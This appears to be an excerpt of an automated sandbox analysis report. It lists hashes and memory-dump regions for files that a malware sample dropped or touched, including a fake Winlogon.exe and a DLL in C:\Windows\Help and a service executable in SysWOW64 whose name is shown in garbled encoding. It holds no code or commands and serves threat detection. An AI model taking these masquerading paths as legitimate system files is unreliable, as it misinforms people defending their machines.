C:\Users\Admin\AppData\Local\Temp\tmpD543.tmp
| MD5 | 2862e61d09852ea2886c036af0465051 |
| SHA1 | 45e30b14543868213f7f1cba0a1e0cc840fb2cd2 |
| SHA256 | d4ba6219d0aff5a36d129a8475cf35b00043d205f751f63ddd56a5c7d4a03ff3 |
| SHA512 | 33dfd9d12adaa19dd3d4dd7013930e233dd3ff1d114e1e86e50d20ffa848a27582eebdffc09ab974b8de86316c01da6f6254f349992ad507d0f8b13cf0e36579 |
memory/5052-332-0x0000000000400000-0x000000000044F000-memory.dmp
memory/4448-312-0x00000000060E0000-0x00000000064A2000-memory.dmp
C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe
| MD5 | 889b99c52a60dd49227c5e485a016679 |
| SHA1 | 8fa889e456aa646a4d0a4349977430ce5fa5e2d7 |
| SHA256 | 6cbe0e1f046b13b29bfa26f8b368281d2dda7eb9b718651d5856f22cc3e02910 |
| SHA512 | 08933106eaf338dd119c45cbf1f83e723aff77cc0f8d3fc84e36253b1eb31557a54211d1d5d1cb58958188e32064d451f6c66a24b3963cccd3de07299ab90641 |
memory/4448-309-0x00000000060E0000-0x00000000064A2000-memory.dmp
memory/4448-306-0x00000000060E0000-0x00000000064A2000-memory.dmp
memory/4448-304-0x00000000060E0000-0x00000000064A2000-memory.dmp
memory/1492-303-0x00000000009A0000-0x00000000009AC000-memory.dmp
memory/4448-319-0x00000000060E0000-0x00000000064A2000-memory.dmp
memory/4448-315-0x00000000060E0000-0x00000000064A2000-memory.dmp
memory/4828-339-0x0000000074E60000-0x0000000075411000-memory.dmp
memory/4828-344-0x0000000074E60000-0x0000000075411000-memory.dmp
memory/4464-355-0x0000000000420000-0x00000000004E9000-memory.dmp
memory/4464-356-0x0000000000400000-0x000000000041B000-memory.dmp
memory/4464-354-0x0000000000400000-0x000000000041B000-memory.dmp
memory/4464-353-0x0000000000400000-0x000000000041B000-memory.dmp
memory/4448-361-0x0000000000400000-0x00000000019AA000-memory.dmp
memory/3636-364-0x0000000000400000-0x0000000000495000-memory.dmp
memory/3636-362-0x0000000000400000-0x0000000000495000-memory.dmp
memory/4384-372-0x0000015BBDE20000-0x0000015BBDE21000-memory.dmp
memory/4384-373-0x0000015BBDE20000-0x0000015BBDE21000-memory.dmp
memory/4384-374-0x0000015BBDE20000-0x0000015BBDE21000-memory.dmp
memory/4384-383-0x0000015BBDE20000-0x0000015BBDE21000-memory.dmp
memory/4384-382-0x0000015BBDE20000-0x0000015BBDE21000-memory.dmp
memory/4384-381-0x0000015BBDE20000-0x0000015BBDE21000-memory.dmp
memory/4384-380-0x0000015BBDE20000-0x0000015BBDE21000-memory.dmp
memory/4384-379-0x0000015BBDE20000-0x0000015BBDE21000-memory.dmp
memory/4384-378-0x0000015BBDE20000-0x0000015BBDE21000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\holderwb.txt
| MD5 | f94dc819ca773f1e3cb27abbc9e7fa27 |
| SHA1 | 9a7700efadc5ea09ab288544ef1e3cd876255086 |
| SHA256 | a3377ade83786c2bdff5db19ff4dbfd796da4312402b5e77c4c63e38cc6eff92 |
| SHA512 | 72a2c10d7a53a7f9a319dab66d77ed65639e9aa885b551e0055fc7eaf6ef33bbf109205b42ae11555a0f292563914bc6edb63b310c6f9bda9564095f77ab9196 |
C:\Windows\Help\Winlogon.exe
| MD5 | a8ddace9435fe395325fc45dde8bd0a3 |
| SHA1 | dcf9baaa9e3a27450debf4f35112376ed005c800 |
| SHA256 | 6e81d7c71b3e8d731e11ad75d3dac02a4210c9f90fac618af5c00cbce3718658 |
| SHA512 | 2c6006e42ecf31da02a4584e69c0e55390be5a405353307582852728b2ceb65033f3f5cd0b6465b3a1541d19eab95c61b394e3403dee558196c2f2969d82b196 |
C:\Windows\Help\active_desktop_render.dll
| MD5 | 07a36097730666fe9e5434d85a5ab989 |
| SHA1 | 780ca47c15932ed1f9640c17b9bb340410a52338 |
| SHA256 | 1fb4cee4d83d424e0bfcbfd97169ef717b3ebdcc5d01ba7c7c547ae606ad5c3c |
| SHA512 | 4a08080471c660856af724e4480ec721c22c462346e293d93e2f9577e6d669c6b51cd81ef96dfad943c791dfd7f7f0c2d5234a82d81ce5f1c01bb493cda34085 |
memory/3888-427-0x00007FF612BA0000-0x00007FF613120000-memory.dmp
memory/3888-451-0x00007FF612BA0000-0x00007FF613120000-memory.dmp
memory/4448-465-0x0000000000400000-0x00000000019AA000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 37f660dd4b6ddf23bc37f5c823d1c33a |
| SHA1 | 1c35538aa307a3e09d15519df6ace99674ae428b |
| SHA256 | 4e2510a1d5a50a94fe4ce0f74932ab780758a8cbdc6d176a9ce8ab92309f26f8 |
| SHA512 | 807b8b8dc9109b6f78fc63655450bf12b9a006ff63e8f29ade8899d45fdf4a6c068c5c46a3efbc4232b9e1e35d6494f00ded5cdb3e235c8a25023bfbd823992d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | d7cb450b1315c63b1d5d89d98ba22da5 |
| SHA1 | 694005cd9e1a4c54e0b83d0598a8a0c089df1556 |
| SHA256 | 38355fd694faf1223518e40bac1996bdceaf44191214b0a23c4334d5fb07d031 |
| SHA512 | df04d4f4b77bae447a940b28aeac345b21b299d8d26e28ecbb3c1c9e9a0e07c551e412d545c7dbb147a92c12bad7ae49ac35af021c34b88e2c6c5f7a0b65f6a8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 0d1055a071a0979c8605092c0e2abd71 |
| SHA1 | 90caba3066c3fafc14c3ecdcc2621a340bfae94d |
| SHA256 | 706a2eaf2e8d892373ae7643d53c89e6b4bd9e34de07c93ce72d7f045847810d |
| SHA512 | ec0c9e1b1a089b81742c0a08f48955462abb35ca25400e2a0b129e73f20f6d95cbcf09e776918015df3a9ade167a48b041818ae5ead032001d53e7f1ef3c91c9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | a6b5c1d78a466f8d9858a8c6890a70b2 |
| SHA1 | dc95cf6cce8357f2e1a7fcc299d632f16ba3f549 |
| SHA256 | c0b87ec1d43dc3db6c307b9e36f298cab5424a88bae1d524f12b6cc49c1cce73 |
| SHA512 | 8fcbe8002ad80e70ebafcd7e01a477f0464b684cb6d9e13bcb22a92ca07de0bdbfdb504e95ccba3e56dfc31f7ad8a87afae173304dee77529f25d4609bd232bc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 2870b02dd1dc3b5df0ba481312ee85ad |
| SHA1 | 5771a48f1de9904dd7ba92233a921a553c015c5f |
| SHA256 | 41fc2934bcd8509c15634adc63d4f83359c945e5418805d24ccba93c545b14f3 |
| SHA512 | 2a88164e54c7811da23cdb4065a940a1595b9dc824fbb71755ade0a6c8986c3a84a976bf215e6e2ae36969c96b62eb57dda1cf3213a066c2ea74e46a41af0950 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000005
| MD5 | 2e86a72f4e82614cd4842950d2e0a716 |
| SHA1 | d7b4ee0c9af735d098bff474632fc2c0113e0b9c |
| SHA256 | c1334e604dbbffdf38e9e2f359938569afe25f7150d1c39c293469c1ee4f7b6f |
| SHA512 | 7a5fd3e3e89c5f8afca33b2d02e5440934e5186b9fa6367436e8d20ad42b211579225e73e3a685e5e763fa3f907fc4632b9425e8bd6d6f07c5c986b6556d47b1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000003
| MD5 | c813a1b87f1651d642cdcad5fca7a7d8 |
| SHA1 | 0e6628997674a7dfbeb321b59a6e829d0c2f4478 |
| SHA256 | df670e09f278fea1d0684afdcd0392a83d7041585ba5996f7b527974d7d98ec3 |
| SHA512 | af0d024ba1faafbd6f950c67977ed126827180a47cea9758ee51a95d13436f753eb5a7aa12a9090048a70328f6e779634c612aebde89b06740ffd770751e1c5b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006
| MD5 | 56d57bc655526551f217536f19195495 |
| SHA1 | 28b430886d1220855a805d78dc5d6414aeee6995 |
| SHA256 | f12de7e272171cda36389813df4ba68eb2b8b23c58e515391614284e7b03c4d4 |
| SHA512 | 7814c60dc377e400bbbcc2000e48b617e577a21045a0f5c79af163faa0087c6203d9f667e531bbb049c9bd8fb296678e6a5cdcad149498d7f22ffa11236b51cb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000004
| MD5 | b275fa8d2d2d768231289d114f48e35f |
| SHA1 | bb96003ff86bd9dedbd2976b1916d87ac6402073 |
| SHA256 | 1b36ed5c122ad5b79b8cc8455e434ce481e2c0faab6a82726910e60807f178a1 |
| SHA512 | d28918346e3fda06cd1e1c5c43d81805b66188a83e8ffcab7c8b19fe695c9ca5e05c7b9808599966df3c4cd81e73728189a131789c94df93c5b2500ce8ec8811 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 7421f3dc3bca7e7da99f5596fd498037 |
| SHA1 | 9bf166876952b94c3ccc23e857929bc8893740b1 |
| SHA256 | ec15ae480e6e8546236693850695b73254ea2b24b007f1ab7014836ddc665fad |
| SHA512 | f9e6438c8975f522be23b3f90afbf2b4ed82f9fcb27ff0521835c790c668d160e5372a549fb7f7cb4b6e5e7b951b5b65696ccd734f5b595533848bc2087a8a02 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 7e896888f1dffbbfa68a56444837b439 |
| SHA1 | d25023163c43d5216d4151fcd6f66ca440f343d7 |
| SHA256 | ddeea2f0bc19336d7cb8cd2f87aee0faacefd87ff640a76b7a3284a32da8e4d8 |
| SHA512 | 099bf717d6938ff3f93cd2133a7a1d09ef5b385833f59fde207208fbd1deaee7653d748ea0913c5bd7364286990839d11536a0fac97d0f8f28a25c8a988d6d21 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe591b5e.TMP
| MD5 | 1a75df0cf8a38cdb6e09aeef848801c2 |
| SHA1 | 79c4c7c56decf847f8af98996922725ab9b4fa96 |
| SHA256 | d0791ca45ea1015edab4511607c50f29e0adf95ce23e104c4d133275951a78bf |
| SHA512 | 0e7363ad4d2e07ea0b91273469c789af8fe1b534a9d8679cd19076974ee2675fa63b9750234f5e932caef82721c2f756bc131f7da8571b0c60dd8c48a1011347 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000b
| MD5 | 2be38925751dc3580e84c3af3a87f98d |
| SHA1 | 8a390d24e6588bef5da1d3db713784c11ca58921 |
| SHA256 | 1412046f2516b688d644ff26b6c7ef2275b6c8f132eb809bd32e118208a4ec1b |
| SHA512 | 1341ffc84f16c1247eb0e9baacd26a70c6b9ee904bc2861e55b092263613c0f09072efd174b3e649a347ef3192ae92d7807cc4f5782f8fd07389703d75c4c4e2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000002
| MD5 | 9f96d459817e54de2e5c9733a9bbb010 |
| SHA1 | afbadc759b65670865c10b31b34ca3c3e000cd31 |
| SHA256 | 51b37ee622ba3e2210a8175ecd99d26d3a3a9e991368d0efbb705f21ff9ac609 |
| SHA512 | aa2514018ef2e39ebde92125f5cc6fb7f778f2ab3c35d4ec3a075578fda41a76dbd7239fe2ea61533fb3262c04739c6500d1497c006f511aa3142bb2696d2307 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007
| MD5 | e29b448723134a2db688bf1a3bf70b37 |
| SHA1 | 3c8eba27ac947808101fa09bfe83723f2ab8d6b0 |
| SHA256 | 349cc041df29f65fd7ffe2944a8872f66b62653bbfbd1f38ce8e6b7947f99a69 |
| SHA512 | 4ce801111cb1144cfd903a94fb9630354bf91a5d46bbbe46e820c98949f57d96ec243b655f2edeb252a4ec6a80167be106d71a4b56b402be264c13cc208f3e2c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | cdf8a4727ca2841a99adea8e0c188c3c |
| SHA1 | d3cce1e6240d95094a8a651591cf069102ae659f |
| SHA256 | 88764f2c0db9a95848272cc02c5f14923d9e3e30aefa4df817cbc94101c8519d |
| SHA512 | 6390ae2ca87cf55114209f4c06ada81e534318e24ede2fdfc145315c5cd20f9efa61b10dc6a8e8d0ff5d6f8747303017038cc50d38d9915c53167a29540d2d59 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 8f33c349a04cb08aeefbdd0b4ae513eb |
| SHA1 | 2da5557e317644ae0e38b86e1e2ae01a3bac630e |
| SHA256 | cec1988e72fc7b1f74a63cc0d29950517527f395783289d8ba0cdf211e93f113 |
| SHA512 | c02ca655721a65bf86b784bad69f3d9c87f61b0638d03b131c2290a179c8200c0399e93cb9182c534a6affe0a6c601429a0f6e38d4ba882f2a03a00866d7b74b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 4acd7aa52d4d23faed87afd84dc86e4d |
| SHA1 | 4d4a5bd593c958184be32902b3dbf2f51437449c |
| SHA256 | 38c643957086b960a1d4b303224ce2aeeccaff63a521e329fb798d32974251d0 |
| SHA512 | a40b34fc7b8dda2a129758592a2ce83fb9e4ccc6212fb93b7ce56fd977973f6216182095609ad714387a4cea5f9dcaee69339f1f41bd91ee50615f689bbf32f7 |
C:\Users\Admin\Downloads\Unconfirmed 694643.crdownload
| MD5 | 10dc710dd495e9078ce79b26e18591e0 |
| SHA1 | aef434d6b77158dd2accd746bbc727bbc3367adc |
| SHA256 | be5389a28e952d7ab2d9447c1bdb8eb7d11b24cb02e4b18da367715c2acfdd15 |
| SHA512 | 959c5cb47b9d1c21ddfe2eaac14e0c99c758aab85036705c072525e70255957abc97412ab0ceadd2adbebc1b176699614f71bf50689cf9ff97891e6216a15dc5 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | fe936d5a8ca1db0d0fad682a39803be8 |
| SHA1 | c3408e1080c66bd1f7a2c5c78cc17990259523b6 |
| SHA256 | cfa4188133a9e40364d8c32f96e354c35eecb0a65df22ad974fcab1fb919b3ce |
| SHA512 | e08bf22c7aa5b13fc4b3cf85c77f39810ad89661a33af4c50a9618064c5bed055ecdde9c4e385c344046018f249e2ea9041770e25018ca848c5e225b053c530b |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | dd2caf1f2ad8e03772db28326f7351cb |
| SHA1 | bb915775112d636a13b1a3bfc0e03fddae13202d |
| SHA256 | 92cd2d831dbdb080d30c06feef0149335202908e9475eb2b8319d5ed1f3c0a07 |
| SHA512 | 3c55b40ef69a2de73a3af36c88617fcbabfe22af38344bacb3b4793ca89a749f9b5084b1bf13726e225abd60c3431b01186011aecd46bebd2599fcf1bd8bde20 |
C:\Windows\System32\drivers\hitmanpro37.sys
| MD5 | 55b9678f6281ff7cb41b8994dabf9e67 |
| SHA1 | 95a6a9742b4279a5a81bef3f6e994e22493bbf9f |
| SHA256 | eb5d9df12ae2770d0e5558e8264cbb1867c618217d10b5115690ab4dcfe893c6 |
| SHA512 | d2270c13dc8212b568361f9d7d10210970b313d8cd2b944f63a626f6e7f2feb19671d3fcdbdf35e593652427521c7c18050c1181dc4c114da96db2675814ab40 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 20e7f34c44271d6cde2a092645b15dba |
| SHA1 | 86d7ebfdb069f7e0854f93fee1b7490c13b5f5a2 |
| SHA256 | f8ab4ff2e5cb6cb4be3e3806abe5449d4d3756b93f36e0225c993743c1942640 |
| SHA512 | 38c0d450c41eac45eb63c123c1886690dd484f06d369dd98cb37f44237b8c802d9ce44ea5c3c342e2c5dd8740a639acdfb131131124e3f1c7a670cf335706288 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | e7fbbf59f7b19738e76605c5516db1f2 |
| SHA1 | b6b388d9e8f1c16c8cc3ee48bb39c27b9e0aefda |
| SHA256 | 3c4d4d142d4130295ac28fd97855c7d25f989dbf6ca7a90277f03619d092e762 |
| SHA512 | d335e8b4c6615a7faf5f6d7dc34864f38456a3105dc7bb5a68409cfbe05fda332bfe8547f4983172b2b332434b63a2a97b3f505638175dfdb25a3893dd4d02a7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000005
| MD5 | fc97b88a7ce0b008366cd0260b0321dc |
| SHA1 | 4eae02aecb04fa15f0bb62036151fa016e64f7a9 |
| SHA256 | 6388415a307a208b0a43b817ccd9e5fcdda9b6939ecd20ef4c0eda1aa3a0e49e |
| SHA512 | 889a0db0eb5ad4de4279b620783964bfda8edc6b137059d1ec1da9282716fe930f8c4ebfadea7cd5247a997f8d4d2990f7b972a17106de491365e3c2d2138175 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1
| MD5 | d2de47009fe9073bd140ecb1429e6f0d |
| SHA1 | a1a77144c3ffe60de38eb5daecccdc7bf1d1eced |
| SHA256 | d6eea1ffa740c7842deed381ad338175ec14fecd7ca25245342ca8930ffd0b79 |
| SHA512 | bcd47e091e7309d98c4cabeb782aaecd1e909c61b6254b78dfbb5a9bd1b2c78aac2359514322e82cff3cc7e3e2666161c4e544255495182eef694f87c2e5f409 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000001
| MD5 | 1ac9e744574f723e217fb139ef1e86a9 |
| SHA1 | 4194dce485bd10f2a030d2499da5c796dd12630f |
| SHA256 | 4564be03e04002c5f6eaeaea0aff16c5d0bbdad45359aef64f4c199cda8b195e |
| SHA512 | b8515fb4b9470a7ce678331bbd59f44da47b627f87ea5a30d92ec1c6d583f1607539cd9318a5bccf0a0c6c2bd2637992e0519bd37acdf876f7a11ed184fb5109 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000002
| MD5 | a33b3a3fdf5161be5bd861804961f557 |
| SHA1 | 68a57897f1686a3e62ce9808165e18f31661d077 |
| SHA256 | ac33d8bc6d9a5e769472877d7dd3d035f8088274b886b16cb1898b106da48560 |
| SHA512 | c94c29a5a9da89044504fe06702f00a7fdd5bc7b85e1733c0cc9a363a812c8d8f95672ea7731643229fa4ae2f1a632c73096d90b63799f5bae7639b41151ccb3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000003
| MD5 | d9ab25168f8f536fdf8f92202c6ac060 |
| SHA1 | 789fa090b18ed4195528196cb8883840fb86c801 |
| SHA256 | 2d4f19e670e3081e0039b061c8d80c8037605d5f8a01a9bd58c4ed1537a253c3 |
| SHA512 | 04edad29dd23e2d5f5d5242cf4d98f35f71100e63eacc4ba297736a944155e96e458f1ec0c08d5cf53ab50031ba4fa06f07b1b349062ff896d8e2134afc48b79 |